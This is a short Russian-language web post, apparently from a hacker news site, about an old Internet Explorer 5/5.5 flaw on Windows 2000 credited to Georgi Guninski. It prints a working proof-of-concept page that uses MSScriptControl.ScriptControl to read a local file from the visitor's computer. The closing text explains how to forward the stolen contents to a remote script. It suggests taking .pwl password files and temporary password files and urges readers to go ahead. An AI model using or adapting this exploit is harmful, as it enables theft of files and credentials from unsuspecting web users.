• Партнер

  • Снова возвращаемся к
    любимой всеми теме – тасканию файлов через
    web. Дырка присуща различным IE на Win2K, по
    крайней мере опробовано лично на пятой
    версии, говорят, так же работает и на 5.5. С
    помощью бага можно стащить любой файл с
    компьютера пользователя. Вот например
    данный скрипт тащит с компа пользователя
    файл test.txt.

    <html>
    <h2>
    Written by Georgi Guninski.
    <br>
    Reads c:\test.txt
    <br>
    </h2>
    <script>
    alert("This script reads C:\\TEST.TXT\nYou may need to create it\n")
    v=new ActiveXObject("MSScriptControl.ScriptControl.1");
    v.Language="VBScript";
    x=v.eval('GetObject("c:/test.txt","htmlfile")');
    setTimeout("alert(x.body.outerHTML);",2000);
    </script>
    </html>

    Как видите, ошибка
    состоит в неправильной обработке MSScriptControl.ScriptControl, легко перенаправить
    полученный текст в другой объект, например
    в скрипт поста в базу данных, откуда и
    получить его в готовом виде. Таким образом
    можно например, зная фамилию пользователя,
    стащить у него pwl-файл, утащить временные
    файлы с паролями и т.д. В общем, простор для
    разгула вполне есть – дерзайте.

    З.Ы.: Дырка обнаружена
    Георгием Гунинским, все вопросы к нему.

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии